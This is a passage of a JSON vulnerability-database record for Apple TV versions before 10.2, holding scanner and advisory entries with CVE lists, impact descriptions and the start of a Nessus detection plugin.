"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0736", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", "CVE-2016-10012", "CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2016-2161", "CVE-2016-3619", "CVE-2016-4688", "CVE-2016-5387", "CVE-2016-5636", "CVE-2016-7056", "CVE-2016-7585", "CVE-2016-7922", "CVE-2016-7923", "CVE-2016-7924", "CVE-2016-7925", "CVE-2016-7926", "CVE-2016-7927", "CVE-2016-7928", "CVE-2016-7929", "CVE-2016-7930", "CVE-2016-7931", "CVE-2016-7932", "CVE-2016-7933", "CVE-2016-7934", "CVE-2016-7935", "CVE-2016-7936", "CVE-2016-7937", "CVE-2016-7938", "CVE-2016-7939", "CVE-2016-7940", "CVE-2016-7973", "CVE-2016-7974", "CVE-2016-7975", "CVE-2016-7983", "CVE-2016-7984", "CVE-2016-7985", "CVE-2016-7986", "CVE-2016-7992", "CVE-2016-7993", "CVE-2016-8574", "CVE-2016-8575", "CVE-2016-8740", "CVE-2016-8743", "CVE-2016-9533", "CVE-2016-9535", "CVE-2016-9536", "CVE-2016-9537", "CVE-2016-9538", "CVE-2016-9539", "CVE-2016-9540", "CVE-2016-9586", "CVE-2016-9935", "CVE-2017-2379", "CVE-2017-2381", "CVE-2017-2388", "CVE-2017-2390", "CVE-2017-2398", "CVE-2017-2401", "CVE-2017-2402", "CVE-2017-2403", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2408", "CVE-2017-2409", "CVE-2017-2410", "CVE-2017-2413", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2418", "CVE-2017-2420", "CVE-2017-2421", "CVE-2017-2422", "CVE-2017-2423", "CVE-2017-2425", "CVE-2017-2426", "CVE-2017-2427", "CVE-2017-2428", "CVE-2017-2429", "CVE-2017-2430", "CVE-2017-2431", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2436", "CVE-2017-2437", "CVE-2017-2438", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2443", "CVE-2017-2448", "CVE-2017-2449", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", 
"CVE-2017-2477", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2489", "CVE-2017-2490", "CVE-2017-5029", "CVE-2017-5202", "CVE-2017-5203", "CVE-2017-5204", "CVE-2017-5205", "CVE-2017-5341", "CVE-2017-5342", "CVE-2017-5482", "CVE-2017-5483", "CVE-2017-5484", "CVE-2017-5485", "CVE-2017-5486", "CVE-2017-6974", "CVE-2017-7070"], "modified": "2017-03-27T00:00:00", "id": "APPLE:E8FF9F04ED54DD8E8D5B899FB4A8000E", "href": "https://support.apple.com/kb/HT207615", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-03-27T15:41:24", "description": "Versions of Apple TV earlier than 10.2 are affected by multiple vulnerabilities :\n\n - An unspecified flaw exists related to 'nghttp2' and 'LibreSSL' that is triggered during the handling of a malicious HTTP/2 server. This may allow an attacker to have multiple unspecified impacts. (CVE-2017-2428)\n - A type confusion flaw exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. (CVE-2017-2430)\n - A use-after-free flaw exists in 'libc++' that is triggered when demangling C++ applications. This may allow a malicious application to dereference already freed memory and potentially execute arbitrary code. (CVE-2017-2441)\n - A flaw exists as OTR packets are not properly validated. By spoofing the TLS/SSL server via a packet that appears valid, an attacker with the ability to intercept network traffic (e.g. MitM, DNS cache poisoning) can disclose and optionally manipulate transmitted data. (CVE-2017-2448)\n - An overflow condition exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. This may allow a context-dependent attacker to cause a heap-based buffer overflow, potentially allowing execution of arbitrary code. 
(CVE-2017-2462)\n - An unspecified flaw exists that is triggered as certain input is not properly validated when parsing X.509 certificates. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code.\n\nAdditional flaws exist in the following components :\n\n - Carbon (CVE-2017-2379)\n - CoreGraphics (CVE-2017-2417, CVE-2017-2444)\n - CoreText (CVE-2017-2435, CVE-2017-2450, CVE-2017-2461)\n - FontParser (CVE-2017-2406, CVE-2017-2407, CVE-2017-2439, CVE-2017-2487)\n - ImageIO (CVE-2017-2416, CVE-2017-2432, CVE-2017-2467)\n - Kernel (CVE-2017-2401, CVE-2017-2440, CVE-2017-2456, CVE-2017-2472, CVE-2017-2473, CVE-2017-2474, CVE-2017-2478, CVE-2017-2482, CVE-2017-2483, CVE-2017-2490)\n - Keyboards (CVE-2017-2458)\n - libarchive (CVE-2017-2390)\n - Security (CVE-2017-2451)\n - Webkit (CVE-2017-2367, CVE-2017-2378, CVE-2017-2386, CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2405, CVE-2017-2415, CVE-2017-2419, CVE-2017-2424, CVE-2017-2433, CVE-2017-2442, CVE-2017-2445, CVE-2017-2446, CVE-2017-2447, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2471, CVE-2017-2476, CVE-2017-2481)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-04-02T00:00:00", "type": "nessus", "title": "Apple TV < 10.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2367", "CVE-2017-2378", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2405", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2419", "CVE-2017-2424", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2433", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2442", "CVE-2017-2444", 
"CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apple:apple_tv:*:*:*:*:*:*:*:*"], "id": "700035.PRM", "href": "https://www.tenable.com/plugins/nnm/700035", "sourceData": "Binary data 700035.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:22", "description": "According to its banner, the version of Apple TV on the remote device is prior to 10.2. It is, therefore, affected by multiple vulnerabilities :\n\n - An out-of-bounds read error exists in LibTIFF in the DumpModeEncode() function within file tif_dumpmode.c.\n An unauthenticated, remote attacker can exploit this to crash a process linked against the library or disclose memory contents. (CVE-2016-3619)\n\n - An out-of-bounds read error exists in WebKit when handling certain JavaScript code. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when handling certain regular expressions. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to exhaust available memory resources. (CVE-2016-9643)\n\n - An information disclosure vulnerability exists in WebKit when handling page loading due to improper validation of certain input. 
An unauthenticated, remote attacker can exploit this to disclose data cross-origin.\n (CVE-2017-2367)\n\n - A buffer overflow condition exists in the Carbon component when handling specially crafted DFONT files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code.\n (CVE-2017-2379)\n\n - An information disclosure vulnerability exists in WebKit when handling unspecified exceptions. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose data cross-origin. (CVE-2017-2386)\n\n - A flaw exists in the libarchive component due to the insecure creation of temporary files. A local attacker can exploit this, by using a symlink attack against an unspecified file, to cause unexpected changes to be made to file system permissions. (CVE-2017-2390)\n\n - Multiple memory corruption issues exist in WebKit that allow an unauthenticated, remote attacker to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2476)\n\n - A memory corruption issue exists in the Kernel component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2401)\n\n - Multiple memory corruption issues exist in the FontParser component when handling font files due to improper validation of certain input. An unauthenticated, remote attacker can exploit these to cause a denial of service condition or the execution of arbitrary code. 
(CVE-2017-2406, CVE-2017-2407, CVE-2017-2487)\n\n - An unspecified type confusion error exists in WebKit that allows an unauthenticated, remote attacker to execute arbitrary code by using specially crafted web content. (CVE-2017-2415)\n\n - A memory corruption issue exists in the ImageIO component, specifically in the GIFReadPlugin::init() function, when handling image files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted image file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2416)\n\n - An infinite recursion condition exists in the CoreGraphics component when handling image files. An unauthenticated, remote attacker can exploit this, via a specially crafted image file, to cause a denial of service condition. (CVE-2017-2417)\n\n - An unspecified flaw exists related to nghttp2 and LibreSSL. An unauthenticated, remote attacker can exploit this, by convincing a user to access a malicious HTTP/2 server, to have an unspecified impact on confidentiality, integrity, and availability.\n (CVE-2017-2428)\n\n - A type confusion error exists in the Audio component when parsing specially crafted M4A audio files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code.\n (CVE-2017-2430)\n\n - An integer overflow condition exists in the ImageIO component when handling JPEG files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2432)\n\n - A memory corruption issue exists in the CoreText component when handling font files due to improper validation of certain input. 
An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2435)\n\n - An out-of-bounds read error exists in the FontParser component when handling font files. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to disclose process memory.\n (CVE-2017-2439)\n\n - An integer overflow condition exists in the Kernel component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to execute arbitrary code with kernel-level privileges. (CVE-2017-2440)\n\n - A use-after-free error exists in libc++abi when demangling C++ applications. An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to execute arbitrary code. (CVE-2017-2441)\n\n - A memory corruption issue exists in WebKit within the CoreGraphics component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frame objects due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions that are called from built-in strict mode scripts not being properly restricted from calling sensitive native functions. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary code. 
(CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose memory contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in the Security component due to improper validation of OTR packets under certain conditions. A man-in-the-middle attacker can exploit this to disclose and optionally manipulate transmitted data by spoofing the TLS/SSL server via a packet that appears to be valid. (CVE-2017-2448)\n\n - An out-of-bounds read error exists in CoreText component when handling font files. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to disclose process memory. (CVE-2017-2450)\n\n - A buffer overflow condition exists in the Security component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to execute arbitrary code with root privileges. (CVE-2017-2451)\n\n - A race condition exists in the Kernel component when handling memory using the 'mach_msg' system call. An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code with root privileges.\n (CVE-2017-2456)\n\n - A buffer overflow condition exists in the Keyboards component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2458)\n\n - A denial of service vulnerability exists in the CoreText component when handling specially crafted text messages due to improper validation of certain input. 
An unauthenticated, remote attacker can exploit this to exhaust available resources on the system.\n (CVE-2017-2461)\n\n - A heap buffer overflow condition exists in the Audio component when parsing specially crafted M4A audio files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to execute arbitrary code.\n (CVE-2017-2462)\n\n - A memory corruption issue exists in the ImageIO component when handling specially crafted files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code.\n (CVE-2017-2467)\n\n - A use-after-free error exists in the Kernel component in the XNU port actions extension due to improper handling of port references in error cases. A local attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code with kernel-level privileges. (CVE-2017-2472)\n\n - A signedness error exists in the Kernel component in the SIOCSIFORDER IOCTL due to improper validation of certain input. A local attacker can exploit this to cause an out-of-bounds read and memory corruption, resulting in a denial of service condition or the execution of arbitrary code with kernel-level privileges.\n (CVE-2017-2473)\n\n - An off-by-one overflow condition exists in the Kernel component in the SIOCSIFORDER IOCTL due to improper validation of certain input. A local attacker can exploit this to cause a heap-based buffer overflow, resulting in the execution of arbitrary code with kernel-level privileges. (CVE-2017-2474)\n\n - A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frames due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. 
(CVE-2017-2475)\n\n - A race condition exists in the Kernel component in the necp_open() function when closing file descriptors due to improper handling of proc_fd locks. A local attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code with kernel-level privileges. (CVE-2017-2478)\n\n - A use-after-free error exists in WebKit when handling ElementData objects. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2481)\n\n - A heap buffer overflow condition exists in the Kernel component within the Berkeley Packet Filter (BPF) BIOCSBLEN IOCTL due to improper validation of certain input when reattaching to an interface. A local attacker can exploit this to cause a denial of service condition or the execution of arbitrary code with kernel-level privileges. (CVE-2017-2482)\n\n - An off-by-one error exists in the Kernel component, specifically in the audit_pipe_open() function, when handling auditpipe devices due to improper validation of certain input. A local attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code with kernel-level privileges. (CVE-2017-2483)\n\n - An unspecified memory corruption issue exists in the Security component when parsing X.509 certificates due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2485)\n\n - A double-free error exists in the Kernel component due to FSEVENTS_DEVICE_FILTER_64 IOCTL not properly locking devices. A local attacker can exploit this to corrupt memory, resulting in the execution of arbitrary code with elevated privileges. (CVE-2017-2490)\n\n - A use-after-free error exists in JavaScriptCore when handling the String.replace() method. 
An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability exists in JavaScriptCore due to an unspecified prototype flaw. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code in a user's browser session.\n (CVE-2017-2492)\n\nNote that only 4th generation models are affected by these vulnerabilities.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-04-10T00:00:00", "type": "nessus", "title": "Apple TV < 10.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2367", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_10_2.NASL", "href": "https://www.tenable.com/plugins/nessus/99264", "sourceData": "#\n# (C) Tenable Network Security, 
Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99264);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2016-3619\",\n \"CVE-2016-9642\",\n \"CVE-2016-9643\",\n \"CVE-2017-2367\",\n \"CVE-2017-2379\",\n \"CVE-2017-2386\",\n \"CVE-2017-2390\",\n \"CVE-2017-2394\",\n \"CVE-2017-2395\",\n \"CVE-2017-2396\",\n \"CVE-2017-2401\",\n \"CVE-2017-2406\",\n \"CVE-2017-2407\",\n \"CVE-2017-2415\",\n \"CVE-2017-2416\",\n \"CVE-2017-2417\",\n \"CVE-2017-2428\",\n \"CVE-2017-2430\",\n \"CVE-2017-2432\",\n \"CVE-2017-2435\",\n \"CVE-2017-2439\",\n \"CVE-2017-2440\",\n \"CVE-2017-2441\",\n \"CVE-2017-2444\",\n \"CVE-2017-2445\",\n \"CVE-2017-2446\",\n \"CVE-2017-2447\",\n \"CVE-2017-2448\",\n \"CVE-2017-2450\",\n \"CVE-2017-2451\",\n \"CVE-2017-2454\",\n \"CVE-2017-2455\",\n \"CVE-2017-2456\",\n \"CVE-2017-2458\",\n \"CVE-2017-2459\",\n \"CVE-2017-2460\",\n \"CVE-2017-2461\",\n \"CVE-2017-2462\",\n \"CVE-2017-2464\",\n \"CVE-2017-2465\",\n \"CVE-2017-2466\",\n \"CVE-2017-2467\",\n \"CVE-2017-2468\",\n \"CVE-2017-2469\",\n \"CVE-2017-2470\",\n \"CVE-2017-2472\",\n \"CVE-2017-2473\",\n \"CVE-2017-2474\",\n \"CVE-2017-2475\",\n \"CVE-2017-2476\",\n \"CVE-2017-2478\",\n \"CVE-2017-2481\",\n \"CVE-2017-2482\",\n \"CVE-2017-2483\",\n \"CVE-2017-2485\",\n \"CVE-2017-2487\",\n \"CVE-2017-2490\",\n \"CVE-2017-2491\",\n \"CVE-2017-2492\"\n );\n script_bugtraq_id(\n 85919,\n 94554,\n 94559,\n 97130,\n 97131,\n 97132,\n 97134,\n 97137,\n 97143,\n 97146,\n 97301,\n 98316\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-6\");\n\n script_name(english:\"Apple TV < 10.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote 
device\nis prior to 10.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An out-of-bounds read error exists in LibTIFF in the\n DumpModeEncode() function within file tif_dumpmode.c.\n An unauthenticated, remote attacker can exploit this\n to crash a process linked against the library or\n disclose memory contents. (CVE-2016-3619)\n\n - An out-of-bounds read error exists in WebKit when\n handling certain JavaScript code. An unauthenticated,\n remote attacker can exploit this to cause a denial of\n service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when\n handling certain regular expressions. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted web page, to exhaust available memory\n resources. (CVE-2016-9643)\n\n - An information disclosure vulnerability exists in WebKit\n when handling page loading due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this to disclose data cross-origin.\n (CVE-2017-2367)\n\n - A buffer overflow condition exists in the Carbon\n component when handling specially crafted DFONT files\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted file, to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2017-2379)\n\n - An information disclosure vulnerability exists in WebKit\n when handling unspecified exceptions. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted web content, to disclose data\n cross-origin. (CVE-2017-2386)\n\n - A flaw exists in the libarchive component due to the\n insecure creation of temporary files. A local attacker\n can exploit this, by using a symlink attack against an\n unspecified file, to cause unexpected changes to be made\n to file system permissions. 
(CVE-2017-2390)\n\n - Multiple memory corruption issues exist in WebKit that\n allow an unauthenticated, remote attacker to cause a\n denial of service condition or the execution of\n arbitrary code. (CVE-2017-2394, CVE-2017-2395,\n CVE-2017-2396, CVE-2017-2454, CVE-2017-2455,\n CVE-2017-2459, CVE-2017-2460, CVE-2017-2464,\n CVE-2017-2465, CVE-2017-2466, CVE-2017-2468,\n CVE-2017-2469, CVE-2017-2470, CVE-2017-2476)\n\n - A memory corruption issue exists in the Kernel component\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to cause a denial of service condition or\n the execution of arbitrary code. (CVE-2017-2401)\n\n - Multiple memory corruption issues exist in the FontParser\n component when handling font files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit these to cause a denial of service condition\n or the execution of arbitrary code. (CVE-2017-2406,\n CVE-2017-2407, CVE-2017-2487)\n\n - An unspecified type confusion error exists in WebKit\n that allows an unauthenticated, remote attacker to\n execute arbitrary code by using specially crafted web\n content. (CVE-2017-2415)\n\n - A memory corruption issue exists in the ImageIO\n component, specifically in the GIFReadPlugin::init()\n function, when handling image files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via a specially crafted image\n file, to cause a denial of service condition or the\n execution of arbitrary code. (CVE-2017-2416)\n\n - An infinite recursion condition exists in the\n CoreGraphics component when handling image files. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted image file, to cause a denial of\n service condition. (CVE-2017-2417)\n\n - An unspecified flaw exists related to nghttp2 and\n LibreSSL. 
An unauthenticated, remote attacker can\n exploit this, by convincing a user to access a malicious\n HTTP/2 server, to have an unspecified impact on\n confidentiality, integrity, and availability.\n (CVE-2017-2428)\n\n - A type confusion error exists in the Audio component\n when parsing specially crafted M4A audio files due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted file, to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2017-2430)\n\n - An integer overflow condition exists in the ImageIO\n component when handling JPEG files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via a specially crafted file,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2017-2432)\n\n - A memory corruption issue exists in the CoreText\n component when handling font files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via a specially crafted file,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2017-2435)\n\n - An out-of-bounds read error exists in the FontParser\n component when handling font files. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted file, to disclose process memory.\n (CVE-2017-2439)\n\n - An integer overflow condition exists in the Kernel\n component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to execute arbitrary code with kernel-level\n privileges. (CVE-2017-2440)\n\n - A use-after-free error exists in libc++abi when\n demangling C++ applications. An unauthenticated, remote\n attacker can exploit this, by convincing a user to run a\n specially crafted application, to execute arbitrary\n code. 
(CVE-2017-2441)\n\n - A memory corruption issue exists in WebKit within the\n CoreGraphics component due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frame objects due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted web content, to execute arbitrary\n script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions\n that are called from built-in strict mode scripts not\n being properly restricted from calling sensitive native\n functions. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n execute arbitrary code. (CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when\n handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted web content, to disclose memory\n contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in the Security component due\n to improper validation of OTR packets under certain\n conditions. A man-in-the-middle attacker can exploit\n this to disclose and optionally manipulate transmitted\n data by spoofing the TLS/SSL server via a packet that\n appears to be valid. (CVE-2017-2448)\n\n - An out-of-bounds read error exists in CoreText component\n when handling font files. An unauthenticated, remote\n attacker can exploit this, via a specially crafted file,\n to disclose process memory. 
(CVE-2017-2450)\n\n - A buffer overflow condition exists in the Security\n component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this,\n by convincing a user to run a specially crafted\n application, to execute arbitrary code with\n root privileges. (CVE-2017-2451)\n\n - A race condition exists in the Kernel component when\n handling memory using the 'mach_msg' system call. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to cause a heap-based buffer overflow,\n resulting in a denial of service condition or the\n execution of arbitrary code with root privileges.\n (CVE-2017-2456)\n\n - A buffer overflow condition exists in the Keyboards\n component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to cause a denial of service condition or\n the execution of arbitrary code. (CVE-2017-2458)\n\n - A denial of service vulnerability exists in the\n CoreText component when handling specially crafted text\n messages due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n exhaust available resources on the system.\n (CVE-2017-2461)\n\n - A heap buffer overflow condition exists in the Audio\n component when parsing specially crafted M4A audio files\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted file, to execute arbitrary code.\n (CVE-2017-2462)\n\n - A memory corruption issue exists in the ImageIO\n component when handling specially crafted files due to\n improper validation of certain input.
An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted file, to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2017-2467)\n\n - A use-after-free error exists in the Kernel component in\n the XNU port actions extension due to improper handling\n of port references in error cases. A local attacker can\n exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code with\n kernel-level privileges. (CVE-2017-2472)\n\n - A signedness error exists in the Kernel component in the\n SIOCSIFORDER IOCTL due to improper validation of certain\n input. A local attacker can exploit this to cause an\n out-of-bounds read and memory corruption, resulting in\n a denial of service condition or the execution of\n arbitrary code with kernel-level privileges.\n (CVE-2017-2473)\n\n - An off-by-one overflow condition exists in the Kernel\n component in the SIOCSIFORDER IOCTL due to improper\n validation of certain input. A local attacker can exploit\n this to cause a heap-based buffer overflow, resulting in\n the execution of arbitrary code with kernel-level\n privileges. (CVE-2017-2474)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frames due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via specially crafted web\n content, to execute arbitrary script code in a user's\n browser session. (CVE-2017-2475)\n\n - A race condition exists in the Kernel component in the\n necp_open() function when closing file descriptors due\n to improper handling of proc_fd locks. A local attacker\n can exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code with\n kernel-level privileges. (CVE-2017-2478)\n\n - A use-after-free error exists in WebKit when handling\n ElementData objects.
